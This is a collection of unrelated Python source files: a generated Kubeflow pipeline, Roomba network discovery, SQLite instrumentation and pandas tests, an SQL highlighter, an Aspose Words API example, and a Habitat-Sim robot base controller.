id | content
---|---
15035
|
import json
import kfp.dsl as _kfp_dsl
import kfp.components as _kfp_components
from collections import OrderedDict
from kubernetes import client as k8s_client
def step1():
from kale.common import mlmdutils as _kale_mlmdutils
_kale_mlmdutils.init_metadata()
from kale.marshal.decorator import marshal as _kale_marshal
from kale.common.runutils import link_artifacts as _kale_link_artifacts
_kale_pipeline_parameters = {}
@_kale_marshal([], ['_b', '_a'], _kale_pipeline_parameters, "/marshal")
def step1():
a = 1
b = 2
return a, b
step1()
_kale_artifacts = {}
_kale_link_artifacts(_kale_artifacts)
_kale_mlmdutils.call("mark_execution_complete")
def step2():
from kale.common import mlmdutils as _kale_mlmdutils
_kale_mlmdutils.init_metadata()
from kale.common.runutils import ttl as _kale_ttl
from kale.marshal.decorator import marshal as _kale_marshal
from kale.common.runutils import link_artifacts as _kale_link_artifacts
_kale_pipeline_parameters = {}
@_kale_ttl(5)
@_kale_marshal(['_b', '_a'], ['_c'], _kale_pipeline_parameters, "/marshal")
def step2(a, b):
c = a + b
print(c)
return c
step2()
_kale_artifacts = {}
_kale_link_artifacts(_kale_artifacts)
_kale_mlmdutils.call("mark_execution_complete")
def step3():
from kale.common import mlmdutils as _kale_mlmdutils
_kale_mlmdutils.init_metadata()
from kale.marshal.decorator import marshal as _kale_marshal
from kale.common.runutils import link_artifacts as _kale_link_artifacts
_kale_pipeline_parameters = {}
@_kale_marshal(['_a', '_c'], [], _kale_pipeline_parameters, "/marshal")
def step3(a, c):
d = c + a
print(d)
step3()
_kale_artifacts = {}
_kale_link_artifacts(_kale_artifacts)
_kale_mlmdutils.call("mark_execution_complete")
_kale_step1_op = _kfp_components.func_to_container_op(step1)
_kale_step2_op = _kfp_components.func_to_container_op(step2)
_kale_step3_op = _kfp_components.func_to_container_op(step3)
@_kfp_dsl.pipeline(
name='test',
description=''
)
def auto_generated_pipeline():
_kale_pvolumes_dict = OrderedDict()
_kale_volume_step_names = []
_kale_volume_name_parameters = []
_kale_marshal_vop = _kfp_dsl.VolumeOp(
name="kale-marshal-volume",
resource_name="kale-marshal-pvc",
modes=['ReadWriteMany'],
size="1Gi"
)
_kale_volume_step_names.append(_kale_marshal_vop.name)
_kale_volume_name_parameters.append(
_kale_marshal_vop.outputs["name"].full_name)
_kale_pvolumes_dict['/marshal'] = _kale_marshal_vop.volume
_kale_volume_step_names.sort()
_kale_volume_name_parameters.sort()
_kale_step1_task = _kale_step1_op()\
.add_pvolumes(_kale_pvolumes_dict)\
.after()
_kale_step_labels = {'common-label': 'true'}
for _kale_k, _kale_v in _kale_step_labels.items():
_kale_step1_task.add_pod_label(_kale_k, _kale_v)
_kale_step_limits = {'amd/gpu': '1'}
for _kale_k, _kale_v in _kale_step_limits.items():
_kale_step1_task.container.add_resource_limit(_kale_k, _kale_v)
_kale_step1_task.container.working_dir = "/test"
_kale_step1_task.container.set_security_context(
k8s_client.V1SecurityContext(run_as_user=0))
_kale_output_artifacts = {}
_kale_step1_task.output_artifact_paths.update(_kale_output_artifacts)
_kale_step1_task.add_pod_label(
"pipelines.kubeflow.org/metadata_written", "true")
_kale_dep_names = (_kale_step1_task.dependent_names +
_kale_volume_step_names)
_kale_step1_task.add_pod_annotation(
"kubeflow-kale.org/dependent-templates", json.dumps(_kale_dep_names))
if _kale_volume_name_parameters:
_kale_step1_task.add_pod_annotation(
"kubeflow-kale.org/volume-name-parameters",
json.dumps(_kale_volume_name_parameters))
_kale_step2_task = _kale_step2_op()\
.add_pvolumes(_kale_pvolumes_dict)\
.after(_kale_step1_task)
_kale_step_labels = {'common-label': 'true'}
for _kale_k, _kale_v in _kale_step_labels.items():
_kale_step2_task.add_pod_label(_kale_k, _kale_v)
_kale_step2_task.set_retry_strategy(
num_retries=5,
retry_policy="Always",
backoff_duration="20",
backoff_factor=2,
backoff_max_duration=None)
_kale_step2_task.container.working_dir = "/test"
_kale_step2_task.container.set_security_context(
k8s_client.V1SecurityContext(run_as_user=0))
_kale_output_artifacts = {}
_kale_step2_task.output_artifact_paths.update(_kale_output_artifacts)
_kale_step2_task.add_pod_label(
"pipelines.kubeflow.org/metadata_written", "true")
_kale_dep_names = (_kale_step2_task.dependent_names +
_kale_volume_step_names)
_kale_step2_task.add_pod_annotation(
"kubeflow-kale.org/dependent-templates", json.dumps(_kale_dep_names))
if _kale_volume_name_parameters:
_kale_step2_task.add_pod_annotation(
"kubeflow-kale.org/volume-name-parameters",
json.dumps(_kale_volume_name_parameters))
_kale_step3_task = _kale_step3_op()\
.add_pvolumes(_kale_pvolumes_dict)\
.after(_kale_step2_task, _kale_step1_task)
_kale_step_annotations = {'step3-annotation': 'test'}
for _kale_k, _kale_v in _kale_step_annotations.items():
_kale_step3_task.add_pod_annotation(_kale_k, _kale_v)
_kale_step_labels = {'common-label': 'true'}
for _kale_k, _kale_v in _kale_step_labels.items():
_kale_step3_task.add_pod_label(_kale_k, _kale_v)
_kale_step3_task.container.working_dir = "/test"
_kale_step3_task.container.set_security_context(
k8s_client.V1SecurityContext(run_as_user=0))
_kale_output_artifacts = {}
_kale_step3_task.output_artifact_paths.update(_kale_output_artifacts)
_kale_step3_task.add_pod_label(
"pipelines.kubeflow.org/metadata_written", "true")
_kale_dep_names = (_kale_step3_task.dependent_names +
_kale_volume_step_names)
_kale_step3_task.add_pod_annotation(
"kubeflow-kale.org/dependent-templates", json.dumps(_kale_dep_names))
if _kale_volume_name_parameters:
_kale_step3_task.add_pod_annotation(
"kubeflow-kale.org/volume-name-parameters",
json.dumps(_kale_volume_name_parameters))
if __name__ == "__main__":
pipeline_func = auto_generated_pipeline
pipeline_filename = pipeline_func.__name__ + '.pipeline.tar.gz'
import kfp.compiler as compiler
compiler.Compiler().compile(pipeline_func, pipeline_filename)
# Get or create an experiment and submit a pipeline run
import kfp
client = kfp.Client()
experiment = client.create_experiment('test')
# Submit a pipeline run
from kale.common import kfputils
pipeline_id, version_id = kfputils.upload_pipeline(
pipeline_filename, "test")
run_result = kfputils.run_pipeline(
experiment_name=experiment.name, pipeline_id=pipeline_id, version_id=version_id)
|
15037
|
import json
import logging
import socket
from roombapy.roomba_info import RoombaInfo
class RoombaDiscovery:
udp_bind_address = ""
udp_address = "<broadcast>"
udp_port = 5678
roomba_message = "irobotmcs"
amount_of_broadcasted_messages = 5
server_socket = None
log = None
def __init__(self):
"""Init discovery."""
self.server_socket = _get_socket()
self.log = logging.getLogger(__name__)
def find(self, ip=None):
if ip is not None:
return self.get(ip)
return self.get_all()
def get_all(self):
self._start_server()
self._broadcast_message(self.amount_of_broadcasted_messages)
robots = set()
while True:
response = self._get_response()
if response:
robots.add(response)
else:
break
return robots
def get(self, ip):
self._start_server()
self._send_message(ip)
return self._get_response(ip)
def _get_response(self, ip=None):
try:
while True:
raw_response, addr = self.server_socket.recvfrom(1024)
if ip is not None and addr[0] != ip:
continue
self.log.debug(
"Received response: %s, address: %s", raw_response, addr
)
data = raw_response.decode()
if self._is_from_irobot(data):
return _decode_data(data)
except socket.timeout:
self.log.info("Socket timeout")
return None
def _is_from_irobot(self, data):
if data == self.roomba_message:
return False
json_response = json.loads(data)
if (
"Roomba" in json_response["hostname"]
or "iRobot" in json_response["hostname"]
):
return True
return False
def _broadcast_message(self, amount):
for i in range(amount):
self.server_socket.sendto(
self.roomba_message.encode(), (self.udp_address, self.udp_port)
)
self.log.debug("Broadcast message sent: " + str(i))
def _send_message(self, udp_address):
self.server_socket.sendto(
self.roomba_message.encode(), (udp_address, self.udp_port)
)
self.log.debug("Message sent")
def _start_server(self):
self.server_socket.bind((self.udp_bind_address, self.udp_port))
self.log.debug("Socket server started, port %s", self.udp_port)
def _decode_data(data):
json_response = json.loads(data)
return RoombaInfo(
hostname=json_response["hostname"],
robot_name=json_response["robotname"],
ip=json_response["ip"],
mac=json_response["mac"],
firmware=json_response["sw"],
sku=json_response["sku"],
capabilities=json_response["cap"],
)
def _get_socket():
server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
server_socket.settimeout(5)
return server_socket
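# --- Hedged usage sketch (not part of the original module) ---
# Broadcast the discovery message on the local network and print every robot
# that answers; the commented line shows probing a single, hypothetical IP.
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    discovery = RoombaDiscovery()
    for robot in discovery.find():
        print(robot)
    # discovery.find("192.168.1.42")  # hypothetical address of a known robot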
|
15052
|
import sqlite3
import mock
import opbeat.instrumentation.control
from tests.helpers import get_tempstoreclient
from tests.utils.compat import TestCase
class InstrumentSQLiteTest(TestCase):
def setUp(self):
self.client = get_tempstoreclient()
opbeat.instrumentation.control.instrument()
@mock.patch("opbeat.traces.RequestsStore.should_collect")
def test_connect(self, should_collect):
should_collect.return_value = False
self.client.begin_transaction("transaction.test")
conn = sqlite3.connect(":memory:")
cursor = conn.cursor()
cursor.execute("""CREATE TABLE testdb (id integer, username text)""")
cursor.execute("""INSERT INTO testdb VALUES (1, "Ron")""")
cursor.execute("""DROP TABLE testdb""")
self.client.end_transaction("MyView")
transactions, traces = self.client.instrumentation_store.get_all()
expected_signatures = ['transaction', 'sqlite3.connect :memory:',
'CREATE TABLE', 'INSERT INTO testdb',
'DROP TABLE']
self.assertEqual(set([t['signature'] for t in traces]),
set(expected_signatures))
# Reorder according to the kinds list so we can just test them
sig_dict = dict([(t['signature'], t) for t in traces])
traces = [sig_dict[k] for k in expected_signatures]
self.assertEqual(traces[0]['signature'], 'transaction')
self.assertEqual(traces[0]['kind'], 'transaction')
self.assertEqual(traces[0]['transaction'], 'MyView')
self.assertEqual(traces[1]['signature'], 'sqlite3.connect :memory:')
self.assertEqual(traces[1]['kind'], 'db.sqlite.connect')
self.assertEqual(traces[1]['transaction'], 'MyView')
self.assertEqual(traces[2]['signature'], 'CREATE TABLE')
self.assertEqual(traces[2]['kind'], 'db.sqlite.sql')
self.assertEqual(traces[2]['transaction'], 'MyView')
self.assertEqual(traces[3]['signature'], 'INSERT INTO testdb')
self.assertEqual(traces[3]['kind'], 'db.sqlite.sql')
self.assertEqual(traces[3]['transaction'], 'MyView')
self.assertEqual(traces[4]['signature'], 'DROP TABLE')
self.assertEqual(traces[4]['kind'], 'db.sqlite.sql')
self.assertEqual(traces[4]['transaction'], 'MyView')
self.assertEqual(len(traces), 5)
|
15064
|
from pygments import highlight as _highlight
from pygments.lexers import SqlLexer
from pygments.formatters import HtmlFormatter
def style():
style = HtmlFormatter().get_style_defs()
return style
def highlight(text):
# Generated HTML contains unnecessary newline at the end
# before </pre> closing tag.
# We need to remove that newline because it's screwing up
# QTextEdit formatting and is being displayed
# as a non-editable whitespace.
highlighted_text = _highlight(text, SqlLexer(), HtmlFormatter()).strip()
# Split generated HTML by last newline in it
# argument 1 indicates that we only want to split the string
# by one specified delimiter from the right.
parts = highlighted_text.rsplit("\n", 1)
# Glue back 2 split parts to get the HTML without last
# unnecessary newline
highlighted_text_no_last_newline = "".join(parts)
return highlighted_text_no_last_newline
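# --- Hedged usage sketch (not part of the original module) ---
# style() returns the CSS rules for HtmlFormatter's token classes, and
# highlight() returns the SQL rendered as HTML without the trailing newline
# discussed above.
if __name__ == "__main__":
    print(style().splitlines()[0])
    print(highlight("SELECT * FROM users WHERE id = 1;"))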
|
15108
|
import os
import asposewordscloud
import asposewordscloud.models.requests
from asposewordscloud.rest import ApiException
from shutil import copyfile
words_api = asposewordscloud.WordsApi(client_id = '####-####-####-####-####', client_secret = '##################')
file_name = 'test_doc.docx'
# Upload original document to cloud storage.
my_var1 = open(file_name, 'rb')
my_var2 = file_name
upload_file_request = asposewordscloud.models.requests.UploadFileRequest(file_content=my_var1, path=my_var2)
words_api.upload_file(upload_file_request)
# Call the AcceptAllRevisions method for the document in the cloud.
my_var3 = file_name
request = asposewordscloud.models.requests.AcceptAllRevisionsRequest(name=my_var3)
words_api.accept_all_revisions(request)
|
15129
|
from __future__ import print_function, absolute_import
import unittest, math
import pandas as pd
import numpy as np
from . import *
class T(base_pandas_extensions_tester.BasePandasExtensionsTester):
def test_concat(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'c_2': ['d', 'e', 'f']})
df.engineer('concat(c_1, c_2)')
self.assertTrue(np.array_equal(df['c_concat(c_1,c_2)'].values,
np.array(['ad', 'be', 'cf'], 'object')))
def test_concat_3_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'c_2': ['d', 'e', 'f'], 'c_3': ['h', 'i', 'j']})
df.engineer('concat(c_3, c_1, c_2)')
self.assertTrue(np.array_equal(df['c_concat(c_3,c_1,c_2)'].values,
np.array(['had', 'ibe', 'jcf'], 'object')))
def test_concat_with_numerical_col(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3]})
df.engineer('concat(c_1,n_2)')
self.assertTrue(np.array_equal(df['c_concat(c_1,n_2)'].values,
np.array(['a1', 'b2', 'c3'], 'object')))
def test_concat_with_numerical_col_3_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6]})
df.engineer('concat(n_3,c_1,n_2)')
self.assertTrue(np.array_equal(df['c_concat(n_3,c_1,n_2)'].values,
np.array(['4a1', '5b2', '6c3'], 'object')))
def test_multiplication(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('mult(n_2, n_3)')
self.assertTrue(np.array_equal(df['n_mult(n_2,n_3)'].values,
np.array([4, 10, 18], long)))
def test_multiplication_3_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('mult(n_2, n_3, n_4)')
self.assertTrue(np.array_equal(df['n_mult(n_2,n_3,n_4)'].values,
np.array([4*7, 80, 18*9], long)))
def test_square_on_whole_data_frame(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('pow(2)')
np.testing.assert_array_equal(df.values,
np.array([
['a', 1, 4, 7, 1*1, 4*4, 7*7],
['b', 2, 5, 8, 2*2, 5*5, 8*8],
['c', 3, 6, 9, 3*3, 6*6, 9*9],
], 'object'))
def test_square_on_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('pow(n_3, 2)')
np.testing.assert_array_equal(df.values,
np.array([
['a', 1, 4, 7, 4*4],
['b', 2, 5, 8, 5*5],
['c', 3, 6, 9, 6*6],
], 'object'))
def test_log_on_whole_data_frame(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('lg()')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 1, 4, 7, math.log(1), math.log(4), math.log(7)],
['b', 2, 5, 8, math.log(2), math.log(5), math.log(8)],
['c', 3, 6, 9, math.log(3), math.log(6), math.log(9)],
], 'object')))
def test_log_on_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('lg(n_3)')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 1, 4, 7, math.log(4)],
['b', 2, 5, 8, math.log(5)],
['c', 3, 6, 9, math.log(6)],
], 'object')))
def test_sqrt_on_whole_data_frame(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('sqrt()')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 1, 4, 7, math.sqrt(1), math.sqrt(4), math.sqrt(7)],
['b', 2, 5, 8, math.sqrt(2), math.sqrt(5), math.sqrt(8)],
['c', 3, 6, 9, math.sqrt(3), math.sqrt(6), math.sqrt(9)],
], 'object')))
def test_sqrt_on_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('sqrt(n_3)')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 1, 4, 7, math.sqrt(4)],
['b', 2, 5, 8, math.sqrt(5)],
['c', 3, 6, 9, math.sqrt(6)],
], 'object')))
def test_rolling_sum_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_sum(n_1,3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 35, 40, 30, 29, 48], df['n_' + col])
def test_rolling_mean_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_mean(n_1,3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 11.66, 13.33, 10, 9.66, 16], df['n_' + col], rtol=1e-3)
def test_rolling_median_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_median(n_1,3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 12, 13, 13, 12, 12], df['n_' + col])
def test_rolling_min_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_min(n_1,3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 10, 12, 2, 2, 2], df['n_' + col])
def test_rolling_max_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_max(n_1,3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 13, 15, 15, 15, 34], df['n_' + col])
def test_rolling_std_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_std(n_1,3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 1.528, 1.528, 7, 6.807, 16.371], df['n_' + col], rtol=1e-3)
def test_rolling_var_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_var(n_1,3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 2.333, 2.333, 49, 46.333, 268], df['n_' + col], rtol=1e-3)
# Multiple Columns
def test_rolling_sum_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_sum(3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 35, 40, 30, 29, 48], df['n_rolling_sum(n_1,3)'])
np.testing.assert_array_equal([np.nan, np.nan, 6, 10, 10, 9, 8], df['n_rolling_sum(n_2,3)'])
def test_rolling_mean_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_mean(3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 11.66, 13.33, 10, 9.66, 16], df['n_rolling_mean(n_1,3)'], rtol=1e-3)
np.testing.assert_allclose([np.nan, np.nan, 2, 3.333, 3.333, 3, 2.666], df['n_rolling_mean(n_2,3)'], rtol=1e-3)
def test_rolling_median_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_median(3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 12, 13, 13, 12, 12], df['n_rolling_median(n_1,3)'])
np.testing.assert_array_equal([np.nan, np.nan, 2, 3, 3, 2, 2], df['n_rolling_median(n_2,3)'])
def test_rolling_min_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_min(3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 10, 12, 2, 2, 2], df['n_rolling_min(n_1,3)'])
np.testing.assert_array_equal([np.nan, np.nan, 1, 2, 2, 2, 2], df['n_rolling_min(n_2,3)'])
def test_rolling_max_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_max(3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 13, 15, 15, 15, 34], df['n_rolling_max(n_1,3)'])
np.testing.assert_array_equal([np.nan, np.nan, 3, 5, 5, 5, 4], df['n_rolling_max(n_2,3)'])
def test_rolling_std_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_std(3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 1.528, 1.528, 7, 6.807, 16.371], df['n_rolling_std(n_1,3)'], rtol=1e-3)
np.testing.assert_allclose([np.nan, np.nan, 1, 1.528, 1.528, 1.732, 1.1547], df['n_rolling_std(n_2,3)'], rtol=1e-3)
def test_rolling_var_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_var(3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 2.333, 2.333, 49, 46.333, 268], df['n_rolling_var(n_1,3)'], rtol=1e-3)
np.testing.assert_allclose([np.nan, np.nan, 1, 2.333, 2.333, 3, 1.333], df['n_rolling_var(n_2,3)'], rtol=1e-3)
def test_method_chaining(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'c_2':['d', 'e', 'f'],
'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.\
engineer('concat(c_1, c_2)').\
engineer('concat(c_1, n_2)').\
engineer('mult(n_2, n_3)').\
engineer('lg(n_2)').\
engineer('pow(n_3, 2)')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 'd', 1, 4, 7, 'ad', 'a1', 4, math.log(1), 4*4],
['b', 'e', 2, 5, 8, 'be', 'b2', 10, math.log(2), 5*5],
['c', 'f', 3, 6, 9, 'cf', 'c3', 18, math.log(3), 6*6]
], 'object')))
def test_chaining_single_call_semi_col_sep(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'c_2':['d', 'e', 'f'],
'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('concat(c_1, c_2);concat(c_1, n_2);mult(n_2, n_3);lg(n_2);pow(n_3, 2)')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 'd', 1, 4, 7, 'ad', 'a1', 4, math.log(1), 4*4],
['b', 'e', 2, 5, 8, 'be', 'b2', 10, math.log(2), 5*5],
['c', 'f', 3, 6, 9, 'cf', 'c3', 18, math.log(3), 6*6]
], 'object')))
def test_chaining_single_with_arr_arg(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'c_2':['d', 'e', 'f'],
'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('concat(c_1, c_2);concat(c_1, n_2);mult(n_2, n_3);lg(n_2);pow(n_3, 2)'.split(';'))
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 'd', 1, 4, 7, 'ad', 'a1', 4, math.log(1), 4*4],
['b', 'e', 2, 5, 8, 'be', 'b2', 10, math.log(2), 5*5],
['c', 'f', 3, 6, 9, 'cf', 'c3', 18, math.log(3), 6*6]
], 'object')))
def test_long_method_chains(self):
df1 = pd.DataFrame({'n_1': [1, 2, 3], 'n_2': [4, 5, 6]})
df2 = pd.DataFrame({'n_1': [1, 2, 3], 'n_2': [4, 5, 6]})
df1.engineer('mult(lg(mult(n_1, n_2)), lg(pow(n_1, 3)))')
df2.engineer('mult(n_1,n_2);pow(n_1,3)')
df2.engineer('lg(pow(n_1,3));lg(mult(n_1, n_2))')
df2.engineer('mult(lg(mult(n_1,n_2)),lg(pow(n_1, 3)))')
np.testing.assert_array_equal(df1.columns.values.sort(), df2.columns.values.sort());
np.testing.assert_array_equal(df1['n_mult(n_1,n_2)'].values, df2['n_mult(n_1,n_2)'].values);
np.testing.assert_array_equal(df1['n_pow(n_1,3)'], df2['n_pow(n_1,3)']);
np.testing.assert_array_equal(df1['n_lg(pow(n_1,3))'], df2['n_lg(pow(n_1,3))']);
np.testing.assert_array_equal(df1['n_lg(mult(n_1,n_2))'], df2['n_lg(mult(n_1,n_2))']);
np.testing.assert_array_equal(df1['n_mult(lg(mult(n_1,n_2)),lg(pow(n_1,3)))'], df2['n_mult(lg(mult(n_1,n_2)),lg(pow(n_1,3)))']);
|
15131
|
import numpy as np
import math
import pyrobot.utils.util as prutil
import rospy
import habitat_sim.agent as habAgent
import habitat_sim.utils as habUtils
from habitat_sim.agent.controls import ActuationSpec
import habitat_sim.errors
import quaternion
from tf.transformations import euler_from_quaternion, euler_from_matrix
class LoCoBotBase(object):
"""docstring for SimpleBase"""
def __init__(self, configs, simulator):
self.configs = configs
self.sim = simulator.sim
self.agent = self.sim.get_agent(self.configs.COMMON.SIMULATOR.DEFAULT_AGENT_ID)
self.transform = None
self.init_state = self.get_full_state()
def execute_action(self, action_name, actuation):
# actions = "turn_right" or "turn_left" or "move_forward"
# returns a bool showing if collided or not
return self._act(action_name, actuation)
def get_full_state(self):
# Returns habitat_sim.agent.AgentState
return self.agent.get_state()
def _rot_matrix(self, habitat_quat):
quat_list = [habitat_quat.x, habitat_quat.y, habitat_quat.z, habitat_quat.w]
return prutil.quat_to_rot_mat(quat_list)
def get_state(self, state_type="odom"):
# Returns (x, y, yaw)
assert state_type == "odom", "Error: Only Odom state is available"
cur_state = self.get_full_state()
init_rotation = self._rot_matrix(self.init_state.rotation)
# true position here refers to the relative position from
# where `self.init_state` is treated as origin
true_position = cur_state.position - self.init_state.position
true_position = np.matmul(init_rotation.transpose(), true_position, dtype=np.float64)
cur_rotation = self._rot_matrix(cur_state.rotation)
cur_rotation = np.matmul(init_rotation.transpose(), cur_rotation, dtype=np.float64)
(r, pitch, yaw) = euler_from_matrix(cur_rotation, axes="sxzy")
# Habitat has y perpendicular to the map whereas ROS has z perpendicular
# to the map; x is the same in both.
# Hence ROS_X = -1 * habitat_z and ROS_Y = -1 * habitat_x
return (-1 * true_position[2], -1 * true_position[0], yaw)
def stop(self):
raise NotImplementedError("Veclocity control is not supported in Habitat-Sim!!")
def set_vel(self, fwd_speed, turn_speed, exe_time=1):
raise NotImplementedError("Veclocity control is not supported in Habitat-Sim!!")
def go_to_relative(
self, xyt_position, use_map=False, close_loop=False, smooth=False
):
"""
Moves the robot to the given
goal state relative to its initial pose.
:param xyt_position: The relative goal state of the form (x,y,t)
:param use_map: When set to "True", ensures that the controller
uses only free space on the map to move the robot.
:param close_loop: When set to "True", ensures that the controller
operates in closed loop by
taking account of odometry.
:param smooth: When set to "True", ensures that the motion
leading to the goal is a smooth one.
:type xyt_position: list
:type use_map: bool
:type close_loop: bool
:type smooth: bool
:return: True if successful; False otherwise (timeout, etc.)
:rtype: bool
"""
try:
if use_map:
raise NotImplementedError(
"Using map feature is not yet supported for Habitat-Sim"
)
if close_loop:
raise NotImplementedError(
"Closed-loop postion control is not supported in Habitat-Sim!"
)
if smooth:
raise NotImplementedError(
"Smooth position control feature is not yet for Habitat-Sim"
)
except Exception as error:
print(error)
return False
(cur_x, cur_y, cur_yaw) = self.get_state()
abs_yaw = cur_yaw + xyt_position[2]
return self._go_to_relative_pose(xyt_position[0], xyt_position[1], abs_yaw)
def go_to_absolute(
self, xyt_position, use_map=False, close_loop=False, smooth=False
):
"""
Moves the robot to the given goal state in the world frame.
:param xyt_position: The goal state of the form (x,y,t)
in the world (map) frame.
:param use_map: When set to "True", ensures that the controller uses
only free space on the map to move the robot.
:param close_loop: When set to "True", ensures that the controller
operates in closed loop by
taking account of odometry.
:param smooth: When set to "True", ensures that the motion
leading to the goal is a smooth one.
:type xyt_position: list
:type use_map: bool
:type close_loop: bool
:type smooth: bool
:return: True if successful; False otherwise (timeout, etc.)
:rtype: bool
"""
try:
if use_map:
raise NotImplementedError(
"Using map feature is not yet supported for Habitat-Sim"
)
if close_loop:
raise NotImplementedError(
"Closed-loop postion control is not supported in Habitat-Sim!"
)
if smooth:
raise NotImplementedError(
"Smooth position control feature is not yet for Habitat-Sim"
)
except Exception as error:
print(error)
return False
(cur_x, cur_y, cur_yaw) = self.get_state()
rel_X = xyt_position[0] - cur_x
rel_Y = xyt_position[1] - cur_y
abs_yaw = xyt_position[2]
# convert rel_X & rel_Y from global frame to current frame
R = np.array([[np.cos(cur_yaw), np.sin(cur_yaw)],
[-np.sin(cur_yaw), np.cos(cur_yaw)]])
rel_x, rel_y = np.matmul(R, np.array([rel_X, rel_Y]).reshape(-1,1))
return self._go_to_relative_pose(rel_x[0], rel_y[0], abs_yaw)
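# Hedged sanity check of the global-to-robot frame conversion above
# (hypothetical numbers, not executed): with cur_yaw = pi/2 the robot's
# x-axis points along global +Y, so R ~ [[0, 1], [-1, 0]] and a global
# offset (rel_X, rel_Y) = (0, 1) maps to (rel_x, rel_y) = (1, 0).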
def _act(self, action_name, actuation):
"""Take the action specified by action_id
:param action_id: ID of the action. Retrieves the action from
`agent_config.action_space <AgentConfiguration.action_space>`
:return: Whether or not the action taken resulted in a collision
"""
did_collide = False
act_spec = ActuationSpec(actuation)
did_collide = self.agent.controls.action(
self.agent.scene_node, action_name, act_spec, apply_filter=True
)
return did_collide
